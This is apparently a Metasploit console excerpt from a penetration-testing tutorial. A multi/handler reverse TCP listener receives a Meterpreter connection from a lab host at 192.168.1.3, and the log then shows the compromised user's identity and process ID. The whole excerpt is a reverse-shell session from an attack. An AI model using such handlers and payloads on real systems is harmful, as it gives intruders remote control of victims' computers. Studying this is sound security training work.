msfexploit(multi/handler) >exploit[*] Started reverse TCP handler on 192.168.1.4:53[*] Sending stage (179779bytes) to 192.168.1.3[*] Meterpreter session 7 opened (192.168.1.4:53 ‐>192.168.1.3:5245) at2019‐01‐2104:55:44‐0500meterpreter>getuidServerusername:John‐PC\Johnmeterpreter>getpidCurrentpid:6988